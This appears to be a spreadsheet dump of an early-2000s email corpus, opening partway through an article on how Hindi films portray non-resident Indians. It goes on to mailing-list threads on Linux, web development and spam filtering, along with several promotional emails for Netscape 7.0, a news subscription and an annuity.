 Naa Pyaar Hai (2000), Refugee (2000), Lajja (2001), and Asoka (2001). 
 The NRI "million-dollar-box-office club" boasts such films as Yaadein 
 (2001) and Lagaan (2001) in the U.S. Taal (1999), Hum Saath Saath Hain 
 (HSSH, 1999), and Mohabbatein (2000) made the mark or better in the U.K. 
 Taal and HSSH doubled their U.K. intakes in the U.S. and brought in $2 
 million each. Kuch Kuch Hota Hai (1998) tallied up $2.6 million in the 
 U.K. Most recently, setting a new high-water mark in the overseas box 
 office, Kabhi Khushi Kabhie Gham (K3G, 2001) grabbed the No. 10 spot its 
 first week of release in the U.S. and earned $2.9 million during its 
 five-week run. In the U.K., K3G earned nearly $3.6 million over an 18 
 week run.
 Impressive? Yes, considering that promotion of Hindi films outside of 
 the Indian community is virtually zero, although that may be on the 
 brink of changing slightly. If nothing else, the figures indicate that 
 the NRI spends a big chunk of change on the films.
 During the past decade, the inclusion of NRI characters in both 
 commercial and non-commercial films has been on the rise, and in a 
 circular logic, it's only natural that they have become a part of these 
 films' stories. Each NRI touches someone in India, and these "global 
 Indians," as filmmaker Subhash Ghai has called them, cannot be shrugged 
 off as a passing phase. Films featuring or "made for" NRIs have been 
 criticized by some in India, but in reality, many of those films have 
 performed extremely well at the Indian box office. Could this speak to 
 the lure of adventure and the romance of the NRI?
 The first Hindi blockbuster to spotlight NRI characters was Dilwale 
 Dulhania Le Jayenge (DDLJ, 1995), the story of two young people who grew 
 up Indian in London. DDLJ introduced us to the mischievous, 
 prank-pulling Raj, who in the beginning fails to graduate but succeeds 
 in pilfering a case of beer from an Indian-owned convenience store. In 
 the end, he steadfastly applies Indian sensibilities in his pursuit of 
 the rebellious-but-trapped Simran as her unwanted arranged marriage 
 approaches. Very possibly, because of this juxtaposition of traits, 
 attitudes, and events, DDLJ enjoys the distinction of being the 
 longest-continually-running film in Indian cinema history.
 Popularity aside, there is the ongoing issue regarding accuracy in the 
 characterization of NRIs in films. Often they are drawn as stereotypes, 
 which are easy to lean on, requiring neither depth nor dimension. 
 Because of this, Hindi filmmakers may be said to straddle the border 
 separating East and West, staying securely at home and dipping into 
 their highly-fantasized world of the Indian diaspora.
 In many cases, commercial Hindi films present an overly-devised sense of 
 the NRI as being either corruptly-Westernized or as being more homesick 
 than a child gone away to camp for the first time. While these concepts 
 may carry a certain truth, the corresponding misconceptions come from 
 the minds of the at-home Indians, who wag a seemingly-envious finger at 
 the NRI's ability to exist in two worlds: one allowing space and upward 
 mobility, the other offering traditions and history.
 Pompous, materialistic, alcohol-drinking, cigarette-smoking, 
 drug-taking, affair-having, spoiled brats 
 The first Hindi film I saw was Subhash Ghai's Pardes (1997). Despite 
 encouraging me to see more films, it made me wonder if "NRI" actually 
 meant "Not Really Indian." If the NRI characters weren't silly, whiney 
 troublemakers, they were mean and nasty, embracing every possible 
 negative human quality in stark contrast to the pristine Kusum Ganga. 
 Even the dialogue and song lyrics in the film were designed to instruct 
 the viewer that the West is inferior but one can still bring India back 
 into one's life. The film is propaganda at its finest and filled with 
 relentless reminders of good vs. evil, purity vs. corruption, right vs. 
 wrong, traditional vs. modern  in short India vs. the West.
 But this is not where the negativity ends.
 Very often, there is a "dress code" for the female characters to help 
 the viewer understand her measure of purity or wickedness: the more 
 traditionally-dressed, the more Indian the woman. Unsurprisingly, this 
 does not seem to carry over to the men's characters.
 Running alongside this can be the "training guide" in which NRIs are 
 constantly reeducated that "This is not India ," "This is not America 
 ," "Only in India ," "This is our culture." The repetition seems less 
 designed to be a natural part of life than to foster reinforcement, as 
 if NRIs are too ignorant to appreciate it the first time.
 When Indians achieve success and wealth, have large homes, and own their 
 companies in these films, they are industrious, clever, and respected 
 businessmen. The NRI equivalent is held up to a double standard and 
 considered materialistic. Even the printed synopsis of Taal in the Eros 
 Entertainment/B4U DVD booklet refers to the NRI characters' "world of 
 ruthless materialism." On the other hand, the Mumbai-based, plagiarizing 
 Vikrant Kapoor character is likeable enough and presented as an 
 opportunist, which seems to be a step up.
 Italy is an unlikely origin for an NRI and offspring in a Hindi film, 
 but Hum Dil De Chuke Sanam (2000) filled the bill. For all the film's 
 splendor, it was regrettable that the Indo-Italian Sameer was presented 
 as a nave, bumbling nerd who had little going for him beyond his 
 singing ability.
 Yaadein gave us a kind and loving, if slightly confused, single parent 
 from London raising three daughters who suffer enough issues to put a 
 therapist into a tailspin. As if that weren't enough, the film includes 
 an American-raised brat who wants nothing to do with parents, settling 
 down, or having babieshardly the ideal Indian bride-to-be.
 And what happens when a married NRI couple splits into the "modern" vs. 
 the "old-fashioned?" The wife is tossed out like the garbage and sent 
 home to India as punishment for being unreceptive to having affairs 
 outside of marriage. Such is the initial setup for Lajja, Rajkumar 
 Santoshi's look into the world of Indian women.
 Show me the way to go home 
 The other extreme of NRIs in film is the homesick, culture-craving, 
 more-patriotic-than-thou Indian. Building their own mini-Indias for 
 maxi-memories, this NRI portrayal takes a real issue and magnifies it to 
 unreal proportions. And no film illustrates that as extravagantly as the 
 lush and sumptuous Kabhi Khushi Kabhi Gham (K3G).
 Not only did K3G enjoy a healthy run at home, it exploded worldwide onto 
 theater screens in Indian communities last December and played to packed 
 houses for weeks. And K3G is a film in which everythinghomes, 
 transportation, finances, fashion, holidays, events, emotions, and 
 tearssets a new standard for the term "larger-than-life."
 In K3G, much of the post-interval footage takes place in England. For 
 Anjali, life in London simmers with a patriotic zeal and an 
 all-consuming homesickness manifested in the meticulous maintenance of 
 Indian customs and rituals while she separates herself from her 
 surroundings. Her need for India is so overwhelming that she relies on 
 the false protection of mocking people and places outside of her own 
 family and home.
 Overkill? Certainly, as writer-director Karan Johar's inflated 
 representation of what have become some of the filmi passions of the 
 typical NRI. But when it boils down to the common denominators without 
 the fanfare, flash, and fervor, even those who move across country miss 
 their families and familiar surroundings; one always retains a credible 
 amount of home-turf loyalty; and if one's heritage is lost, the person 
 is rendered as no more than a racial statistic.
 "Those living in India are surrounded by our culture every minute, even 
 if they don't realize it," says Vivek Malhotra, a thirty-something NRI 
 and business owner in the Chicago area. "Here it's different, but we 
 will always be Indian," he continues, striking at the heart of the 
 perceived problem. "Sometimes, I feel that the movies think we've 
 forgotten that. Maybe the filmmakers should spend some time finding out 
 who we are. I really don't think they have a clue."
 On the upside is a beneficial aspect for the children of NRIs. "It's 
 good that these films show our kids what happens in Indiathe 
 traditions, customs, values," says Parag Gandhi, a long time theater 
 owner and promoter of Hindi films in Chicago. "They may be modernized in 
 India, but the traditional values remain." And many popular films target 
 the late-teens, twenty-something demographic. "Films such as Dilwale 
 Dulhania Le Jayenge, Kuch Kuch Hota Hai, and K3G," adds Gandhi, "are 
 examples of films that are half traditional, half modern, striking a 
 balance between the two for all of the markets."
 Another positive consideration is that not all films show NRIs in a 
 questionable light. Caricatures of NRIs have been challenged in 
 commercial films like Kaho Naa Pyaar Hai, Dil Chhata Hai (2001), Monsoon 
 Wedding (2001), and the recent Kitne Door Kitne Paas, all of which 
 present NRIs as more realistic, more human characters. Aa Ab Laut Chalen 
 offers a variety of NRI personalities from the selfish, the conniving, 
 and the party animal to the lovable cabbies and the pandit-cop who make 
 the best of their situations without complaint. Interestingly, the film 
 also dares to include shop owners, Dunkin' Donuts clerks, gas station 
 attendants: characters who aren't weighed down by palatial surroundings, 
 corporate crises, or overseas judgments.
 The U.S., the U.K., and Australia are represented in Bombay Boys (1999) 
 by three young men coming/returning to Bombay, India for personal 
 reasons. In a refreshing reversal of the typical attitude concerning 
 NRIs in film, the boys are the "good" Indians, and everyone they meet 
 has some relationship with the darker side of the city. At its most 
 basic, the film shows that if something is lost, it won't necessarily be 
 found in India.
 Even the non-commercial, multi-award-winning Bawandar (2001) 
 incorporates an NRI as a connecting thread in the piecing together of 
 Sanvri Devi's story. Curious, passionate about women's rights, the 
 Indo-English journalist represents the fact that the story has a wider 
 interest than a small, rural village.
 Stepping outside of the Hindi film industry for a moment, the 
 English/Telegu film Hyderabad Blues (1998) and the English/Tamil film 
 MitrMy Friend (2002), both smaller-budget films built on delivering 
 messages without preaching, deserve mention. The former engages in the 
 questioning of, rather than the criticism of, East vs. West, and the 
 latter examines the challenges faced by women, NRIs, and their families. 
 The characters and stories of both films enjoy respect in their 
 presentation, partially due to the existence of layered issues that are 
 revealed and resolved (or not) without finger-snapping swiftness or 
 clichd answers. Hyderabad Blues enjoyed a 31-week run in Mumbai alone, 
 and MitrMy Friend is currently one of the most-rented films in Indian 
 communities in the U.S.
 While the inclusion of NRIs in Hindi films does not guarantee box office 
 success outside of India, it does send a strong signal that filmmakers 
 acknowledge this constantly growing and lucrative audience sector. If 
 the big-budget, big box-office commercial films coming out of Mumbai 
 often seem to bite one of the hands that feeds it, has the box office 
 anywhere been adversely affected? Well  no, not by any charted reports 
 that can be found. And that, itself, sends a loud and clear message back 
 to the industry in Mumbai: "if it isn't broken, don't fix it."
 Nevertheless, when filmmakers who see NRIs as falling only to the evil 
 side of Western ways look beyond their assumptions, perhaps they will 
 discard their reliance on stereotypes and start paying their overseas 
 family an increased measure of respect. And when filmmakers who take the 
 homesick and patriotic themes beyond believability analyze their own 
 feelings, perhaps they will realize that what NRIs hold dear in their 
 hearts is no different from what those at home should be proud of. n
 NOTE: All box office figures are reported as US$ and are courtesy of 
 Variety Magazine online archives. Not all Hindi films abroad report box 
 office, and not all box office reports are available.
 Jeanne E. Fredriksen writes from Chicago. She is family with, friends 
 with, acquainted with, and works for NRIs with an amazing variety of 
 personalities, attitudes, hopes, dreams, goals, livelihoods, needs, 
 wants, and beliefs.
 =========================================
 Dilwale Dulhaniya Le Jayenge
 So globally successful is the film that in 1999 it warranted a billboard 
 outside Shinjuku train station in Tokyo, Japan, announcing its 
 screenings sponsored by India Center there. Shinjuku is the 
 entertainment center of Tokyo, and there is plenty of high-profile 
 competition for attention, attendance, and box office. In Japan, where 
 Indian films enjoy a certain popularity with the natives, the country's 
 1995 population census of 125.6 million persons showed only 4,244 were 
 Indian with an additional 13,589 being other South Asians. Without 
 question, DDLJ continues to be a favorite whenever, wherever offered for 
 viewing.
 Kabhi Khushi Kabhie Gham
 According to a report in the South China Morning Post in January, 2002, 
 all screenings of K3G in December, 2001, were sell-outs in Hong Kong, 
 while pirated copies of the film were the hottest items circulating on 
 the island. Hong Kong's 2001 population census of 6.3 million people 
 revealed that 18,543 were Indian and another 23,581 were Nepalese and 
 Pakistani. K3G's popularity in the Special Administrative Region was 
 impressive because Hong Kong enjoys being the third-largest producer of 
 films by volume after India and the U.S. 	
 =====================================================
 Bhansali's Musical Heaven
 By ANIRUDDH CHAWDA
 DEVDAS (Universal, 2002). Hindi film soundtrack. Music: Ismail Darbar. 
 Lyrics: Nusrat Badr
 For perhaps the most eagerly anticipated film of the year, filmmaker 
 Sanjay Leela Bhansali's Devdas had to deliver a score that not only met 
 the hype but also let Ismail Darbar prove that the mega-selling Hum Dil 
 De Chuke Sanam was no one-time flash in the pan. By devising a 
 semi-classical, once-in-a-decade, 100 percent "Indian" musical score, 
 Bhansali and Darbar emerge victorious in baking and serving a 10-layer 
 monumental soundtrack.
 What is most groundbreaking is the powerful one-two punch of lyrics by 
 newcomer Nusrat Badr and the from-soul-voice of first-timer Shreya 
 Ghosal. Ghosal's voice, reminiscent of both Suman Kalyanpur with a 
 slightly thicker pitch and Anuradha Paudwal without the nasal monotone, 
 is the most original singing voice since Kavita Subramaniam appeared in 
 the Mangeshkar mold. Ghosal's "Silsila ye chaahat ka" is a sultry 
 tabla-dominated opening to 52 minutes of sheer musical bliss. "Maar 
 daala" (Subramaniam, KK) is an excellent example of the use of classical 
 ragas to complement, rather than fill-in, interludes between verses. On 
 "Kahe chhed," Pandit Birju Maharaj, using his own tune, adds an 
 intoxicating opening for Madhuri Dixit's vocals and Subramaniam to 
 finish out a piercing song of longing.
 While a combination of Ghosal and Subramaniam give life to on-screen 
 lip-synching for Madhuri Dixit and Aishwarya Rai, on the male side Udit 
 Narayan fronts for Shah Rukh Khan. Narayan's on-target "Bairi piya," a 
 duet with Ghosal, could find company in many Lata-Rafi duets of yore. 
 The up-tempo "Chalak chalak" again smoothly floats Narayan with Vinod 
 Rathod and Ghosal while Subramaniam and Ghosal's jugalbandhi on "Dola re 
 dola" simply shakes the rafters.
 Packaged in Universal's Bombay plant, the earliest CD pressings have a 
 cheap, paper-thin casing. Purists may consider replacing the cheap cover 
 with a store-bought sturdier one. At a suggested Bombay retail value of 
 about $2 and selling like hot cakes stateside for $10 a pop, Devdas is 
 without doubt a huge profit-maker for the multinational music marketer. 
 But buyers beware: avoid being distracted by bootleg CDs. This 
 exceptional music and exceptionally well-recorded CD deserve 
 unadulterated musical glory. Pop in only a properly copyrighted, 
 original CD and let Darbar &amp; Co. whisk you away on a magical musical 
 ride.
 Lifelong cinephile Aniruddh Chawda lives, works, and writes from 
 Wisconsin, on America's north coast.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Spambayes] Current version
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Richie&gt; As I understand it, post-1.8x versions of the core bsddb code
     Richie&gt; ship under the Sleepycat license, which demands that projects
     Richie&gt; using it must be published-source.  
 Don't use bsddb in a closed-source product.  Use dbm or dumdbm or use
 pickles or roll your own thang.  I doubt the presence of bsddb would be the
 only barrier to creating a closed-source product based upon the spambayes
 code.
 Skip
 _______________________________________________
 Spambayes mailing list
 Spambayes@python.org
 http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Announcing the New Netscape 7.0 - The Fastest Netscape Browser Ever
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format.
 --______BoundaryOfDocument______
 Content-Type: text/plain
 Content-Transfer-Encoding: 7bit
 Netscape Valued Customer:
 Announcing the NEW Netscape 7.0 Browser!
 Download it now for FREE!
 For more information and to download now, click here:
 http://dms-www01.netcenter.com/cgi-bin/gx.cgi/mcp?p=041Lnf041LoE51b9er012000W2TBvFJ
 Get Netscape 7.0 - the Fastest Netscape Browser Ever!
 It's easier than ever to upgrade to Netscape 7.0, and
 keep your bookmarks and browser settings.
 Upgrade to the NEW Netscape 7.0, and get the most from
 your time on-line.
 And Netscape 7.0 is also available on CD for FREE!
 Click here to order the CD and Guidebook:
 http://dms-www01.netcenter.com/cgi-bin/gx.cgi/mcp?p=041Lnh041LoE51b9er012000W2TBvFJ
 The Netscape Browser Team
 ----------------------------------------------------------- 
 Netscape respects your online time and Internet privacy. 
 If you would prefer not to receive future email messages 
 from Netscape Netbusiness, please click on the following 
 link or simply reply to this email and type "REMOVE" in the 
 subject line. 
 PLEASE NOTE: DO NOT CLICK ON THE LINK UNLESS YOU 
 WANT TO UNSUBSCRIBE. 
 http://dms-www01.netcenter.com/cgi-bin/gx.cgi/mcp?p=041LoB3SLb41LoE51b9er012000W2TBvFJ 
 You are subscribed with:[ler@lerami.lerctr.org]
 (c) 2002 Netscape. All Rights Reserved. Privacy Policy, Terms 
 of Service.
 http://channels.netscape.com/ns/browsers/download.jsp
 --______BoundaryOfDocument______
 Content-Type: text/html
 Content-Transfer-Encoding: 7bit
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;Netscape 7.0&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;table bgcolor="#99CCCC" width=530 border="0" cellpadding="0" cellspacing="0"&gt;
 &lt;!--TOP RULE--&gt;
 &lt;!--LOGO ROW--&gt;
 &lt;tr bgcolor="#4A7394"&gt;
 	&lt;td rowspan=2 width=182&gt;&lt;img src="http://dms-www1.netscape.com/N7/promo/images/logo-netscape.gif?N7F1=26516021" alt="Netscape 7.0" width="182" height="39" border="0"&gt;&lt;/td&gt;
 	&lt;td colspan="3" width=348&gt;&lt;img src="http://dms-www1.netscape.com/N7/promo/images/spacer.gif" width="348" height="1" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr bgcolor="#003366"&gt;
 	&lt;td width=18&gt;&lt;img src="http://dms-www1.netscape.com/N7/promo/images/spacer.gif" alt="" width="18" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td colspan="2" width=330&gt;&lt;FONT FACE="arial,helvetica,sans-serif" COLOR="#FFFFFF" SIZE="-1"&gt;&lt;B&gt;Announcing the&lt;/B&gt;&lt;/FONT&gt;
 	&lt;FONT FACE="arial,helvetica,sans-serif" COLOR="#ffff00" SIZE="-1"&gt;&lt;B&gt;NEW&lt;/B&gt;&lt;/FONT&gt;
 	&lt;FONT FACE="arial,helvetica,sans-serif" COLOR="#FFFFFF" SIZE="-1"&gt;&lt;B&gt;Netscape 7.0 Browser!&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;
 	&lt;FONT FACE="arial,helvetica,sans-serif" COLOR="#FFFFFF" SIZE="-1"&gt;&lt;B&gt;Download it now for &lt;/B&gt;&lt;/FONT&gt;
 	&lt;FONT FACE="arial,helvetica,sans-serif" COLOR="#ffff00" SIZE="-1"&gt;&lt;B&gt;FREE!&lt;/B&gt;&lt;/FONT&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!--HEADER SHADOW--&gt;
 &lt;tr bgcolor="#99CCCC"&gt;
 	&lt;td width=182&gt;&lt;img src="http://dms-www1.netscape.com/N7/promo/images/header-shadow-lt.gif" width="182" height="32" border="0"&gt;&lt;/td&gt;
 	&lt;td width=348 colspan="3" valign="top"&gt;&lt;img src="http://dms-www1.netscape.com/N7/promo/images/header-shadow-rt.gif" alt="" width="338" height="29" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr bgcolor="#99CCCC"&gt;
 &lt;!--LEFT COLUMN CONTENT--&gt;
 	&lt;td valign="top"&gt;
 	&lt;img src="http://dms-www1.netscape.com/N7/promo/images/spacer.gif" alt="" width="1" height="3" border="0"&gt;&lt;br&gt;
 	&lt;img src="http://dms-www1.netscape.com/N7/promo/images/headline-available.gif" alt="Netscape 7.0 also available on CD - FREE!" width="182" height="77" border="0"&gt;&lt;br&gt;
 	&lt;img src="http://dms-www1.netscape.com/N7/promo/images/img-cd-book.gif" alt="" width="182" height="153" border="0"&gt;
 	&lt;/td&gt;
 &lt;!--SPACER COLUMN--&gt;
 	&lt;td&gt;&lt;img src="http://dms-www1.netscape.com/N7/promo/images/spacer.gif" alt="" width="18" height="1" border="0"&gt;
 	&lt;/td&gt;
 &lt;!--MIDDLE COLUMN CONTENT--&gt;
 	&lt;td valign="top"&gt;
 	&lt;table width=320 border="0" cellpadding="0" cellspacing="0"&gt;
 		&lt;tr valign="top"&gt;
 		&lt;td width="205"&gt;
 		&lt;FONT FACE="arial,helvetica,sans-serif" COLOR="#000000" SIZE="+1"&gt;&lt;B&gt;Get Netscape 7.0 -&lt;br&gt;
 		the Fastest Netscape&lt;br&gt;Browser Ever!&lt;/B&gt;&lt;/FONT&gt;
 		&lt;/td&gt;
 		&lt;td width="115"&gt;
 		&lt;img src="http://dms-www1.netscape.com/N7/promo/images/burst-free.gif" alt="FREE" width="115" height="71" border="0"&gt;&lt;br&gt;
 		&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;tr&gt;
 		&lt;td colspan="2"&gt;
 		&lt;FONT FACE="arial,helvetica,sans-serif" COLOR="#000000" SIZE="-1"&gt;&lt;B&gt;It's easier than ever to upgrade to Netscape 7.0,&lt;br&gt;
 		and keep your bookmarks and browser settings.&lt;br&gt;&lt;br&gt;
 		Upgrade to the NEW Netscape 7.0, and get the&lt;br&gt;
 		most from your time on-line.&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;
 		&lt;img src="http://dms-www1.netscape.com/N7/promo/images/spacer.gif" alt="" width="1" height="26" border="0"&gt;&lt;br&gt;
 		&lt;A HREF=http://dms-www01.netcenter.com/cgi-bin/gx.cgi/mcp?p=041Lnj041LoE51b9er012000W2TBvFJ&gt;&lt;img src="http://dms-www1.netscape.com/N7/promo/images/button-free-cd.gif" alt="FREE CD ROM" width="137" height="28" border="0"&gt;&lt;/a&gt;
 		&lt;img src="http://dms-www1.netscape.com/N7/promo/images/spacer.gif" alt="" width="26" height="1" border="0"&gt;
 		&lt;A HREF=http://dms-www01.netcenter.com/cgi-bin/gx.cgi/mcp?p=041Lng041LoE51b9er012000W2TBvFJ&gt;&lt;img src="http://dms-www1.netscape.com/N7/promo/images/button-free-dnld.gif" alt="FREE DOWNLOAD" width="137" height="28" border="0"&gt;&lt;/a&gt;
 		&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;/td&gt;
 &lt;!--SPACER COLUMN--&gt;
 	&lt;td&gt;&lt;img src="http://dms-www1.netscape.com/N7/promo/images/spacer.gif" alt="" width="10" height="1" border="0"&gt;
 	&lt;/td&gt;	
 &lt;/tr&gt;
 &lt;!--LEGAL SECTION--&gt;
 &lt;tr bgcolor="#99CCCC"&gt;
 	&lt;td colspan="4"&gt;
 	&lt;FONT FACE="arial,helvetica,sans-serif" COLOR="#000000" SIZE="1"&gt;
 	&lt;CENTER&gt;&lt;BR&gt;To Unsubscribe, click &lt;A HREF=http://dms-www01.netcenter.com/cgi-bin/gx.cgi/mcp?p=041LoB3SLb41LoE51b9er012000W2TBvFJ&gt;here&lt;/a&gt; and follow the instructions on the following page&lt;br&gt;
 	- or simply reply to this e-mail and type "REMOVE" in the subject line.&lt;br&gt;
 	&amp;copy; 2002 Netscape, All Rights Reserved. &lt;A HREF=http://dms-www01.netcenter.com/cgi-bin/gx.cgi/mcp?p=041LoK041LoE51b9er012000W2TBvFJ&gt;Legal &amp;amp; Privacy Notices&lt;/a&gt;&lt;br&gt;&lt;BR&gt;
 	&lt;/CENTER&gt;&lt;/FONT&gt;
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 --______BoundaryOfDocument______--
 :
 annmn:[041LoE041LoE51b9er012000W2TBvFJ]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Webdev] Migrating TO W2K
</t>
  </si>
  <si>
    <t xml:space="preserve">I thought I read somewhere that work on phpTriad had ceased?
 Setting up MySQL/PHP/Perl (activestate)/Apache on win2k server is a
 piece of cake anyhow
 Niall
 On Wed, 2002-07-31 at 11:05, William Harrison - Protocol wrote:
 &gt; Hi Nick
 &gt; 
 &gt; Try PHPTriad
 &gt; 
 &gt;  http://download.com.com/3000-2165-6474268.html?tag=lst-0-1
 &gt; 
 &gt; "PHPTriad is a complete PHP development and server environment for Windows.
 &gt; It installs PHP, Apache, MySQL, and PHPMyAdmin, both installing and setting
 &gt; up the environment. Version 2.11 updates all components and it now includes
 &gt; Perl 5."
 &gt; 
 &gt; HTH
 &gt; 
 &gt; Will
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; Webdev mailing list
 &gt; Webdev@linux.ie
 &gt; http://www.linux.ie/mailman/listinfo/webdev
 &gt; 
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Setting up a spam eating address
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "Steve Thomas" said:
 &gt; I created a user (honeypot) and set up an alias to it. Then I added a
 &gt; 'hidden' (font color same as background color) link to that address at the
 &gt; bottom of my html pages. The .procmailrc file for that user is: .....
 &gt; which will submit the msg to razor then save it locally. I set this up about
 &gt; a month ago, and haven't received anything other than some viruses (Sircam)
 &gt; on it yet. The viruses are rejected at the MTA level, so they're not being
 &gt; saved/reported to razor.
 FWIW, I would now recommend doing this (using a user with a procmailrc)
 instead of a system alias; more secure, and easier to filter out crud
 like bounces, virii etc. that render a corpus dirty.
 --j.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</si>
  <si>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Keeping up with The Sims: Managing Large Scale Game Content
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613666,159/
 Date: 2002-10-06T18:12:54+01:00
 With project budgets in the multiple millions of dollars and virtually no 
 margin for error, more and more development teams are under tremendous pressure 
 to come out on top of the entertainment software market's cutthroat 
 competition. No team manager wants to contemplate dropping the ball when 
 creating the vivid graphics necessary to help make a game a success. Electronic 
 Arts' The Sims franchise is an excellent example of this pressurized situation. 
 This article highlights the critical issues that govern the high volume asset 
 production needed for today's most demanding games.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Iraq Today Daily News - FREE Trial
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,
 My name is Petr Stanek and I am managing the Iraq Today
 news service (www.europeaninternet.com/iraq). Iraq Today
 contains hourly updated breaking news headlines, exchange rates,
 market news and other important information.
 You and your associates can have a FREE TRIAL
 SUBSCRIPTION to Iraq Today.
 You will have access to a collection of 25,000 daily updated
 articles, a news archive and many other benefits too.
 Once again, this trial is FREE. To subscribe, just reply to this
 e-mail or sign up at:
 http://www.europeaninternet.com/login/affiliate_register.php3
 A partial list of current EIN subscribers can be found at:
 http://www.europeaninternet.com/mediakit/
 If you have any questions, comments, or need assistance signing
 up, please contact us personally by either writing to
 helpdesk@europeaninternet.com or simply replying to this email.
 Please feel free to forward this offer to any of your colleagues.
 Best regards,
 Petr Stanek
 Subscription Department
 EIN News
 To be removed please reply to: remove@europeaninternet.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: "Hidden tree" the secret of Zen garden
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8251865,1440/
 Date: Not supplied
 A subconsciously perceptible pattern explains the mysterious appeal of a famous 
 old Japanese garden, say researchers
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;rant&gt;
 I swear to god you have to be so carefull with dell machines and linux. My
 laptop is the only dell 
 that I've had so far that you could do a quick clean install of linux on.
 Every machine recently seems 
 to have some cheapo piece of hardware (eth card, modem, sound, graphics )
 that is incompatable/unsupported. 
 I don't know how long I've spent banging my head off the wall with some crap
 dell machine that 
 the secretary/store manager/windoze admin of whatever company I've been in
 has ordered.
 Ok everything is budget basement these days but they're getting the
 components cheaper as well. 
 If you do buy from dell be damned carefull what you order cause the default
 config cheapo machines 
 are allways a pain in the hole. 
 &lt;/rant&gt;
 --B
 -----Original Message-----
 From: deccy@csn.ul.ie [mailto:deccy@csn.ul.ie]
 Sent: 01 August 2002 23:19
 To: ilug@linux.ie
 Subject: [ILUG] Dell GX260 V Redhat 7.3
 Hi,
 We just got some new Dell GX260 machines here are work and I'm supposed to
 be putting Linux on them. I tried installing RedHat 7.3. It just didn't want
 to know about the graphics card. I's an onboard Intel DVMT chip. No
 dedicated memory, it takes it from the onboard RAM.
 I was wondering if anybody had gotton these machines and had any luck
 getting this graphics card working?
 When this graphics card didn't work, I installed a PCI Diamond Stealth 64
 VRAM card. Xconfigurator auto-detected this and my 21" SUN monitor no
 problem but whenever it tries to test the configuration it fails and the
 screen is left with a blue background and all of the text is blue.
 Does anybody have any idea what the problem is or how to fix it?
 Cheers,
 deccy.
 -- 
 ---------------------------------------
 Declan Houlihan
 deccy@csn.ul.ie
 http://deccy.csn.ul.ie/
 ---------------------------------------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</si>
  <si>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Teach a man to fish
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/08.html#teach_a_man_to_fish
 Date: 2002-10-08T00:22:08-05:00
 _Kevin Hemenway_: Finding More Channels[1]. &amp;#8220;In simple terms, there are 
 thousands of web sites that are actively providing their news and headlines in 
 a format AmphetaDesk can understand [RSS]. And while AmphetaDesk knows about a 
 good number of these sites, it'd be impossible to hunt down each and every 
 single possibility. So, this page is here to teach you how to fish.&amp;#8221;
 [1] http://www.disobey.com/amphetadesk/finding_more.html
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2 Sep 2002, Reza B'Far (eBuilt) wrote:
 &gt; With the increasing prevalence of web services (not that they are always a
 &gt; good thing), I doubt that parsing XML will be something that will remain at
 &gt; the Java application layer for long... Recent threads here on Fork
 &gt; indicating the move towards hardware parsing or this code even become part
 &gt; of the native implementation of Java on various platforms...
 OK, so, you get the XML toss it through hardware and turn it back into a
 struct/object whatever you call your binary data. I agree this is the way
 things will go, as XML parsing has just too much overhead to survive in the
 application layer. So why turn it into XML in the first place? Becasue it
 gives geeks something to do and sells XML hardware accelerators and way more
 CPUs?
 Is there anyone out there actually doing anything new that actually IMPROVES
 things anymore, or are they all too scared of the fact that improvements put
 people out of work and cut #1 is the creators...
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Upside Only Treasury-Linked Annuity
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0007_01C1FAAC.4A47E870
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  A one of a kind annuity...that isn't a gamble!=0A=
 Upside Only -
 Treasury-Linked - 4% Commission
  =09
  Liquid after 5 years!=0A=
 4.75% Minimum Guaranteed floor for 5 years*=09
   _____ =20
  ? Upside of annual increases in 5-Year T-Note
 ? Bonus Crediting Over Normal Treasury Notes
 ? "Alternative for Large Municipal Bond or T-Note Buyers"
   _____ =20
  	=20
 Call or e-mail &lt;mailto:annuities@fsfginc.com&gt;  us today!
  800-235-7949
 ? or ?	=20
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
  &lt;http://www.fsfginc.com&gt;=20
 *For deposits over $100,000 =09
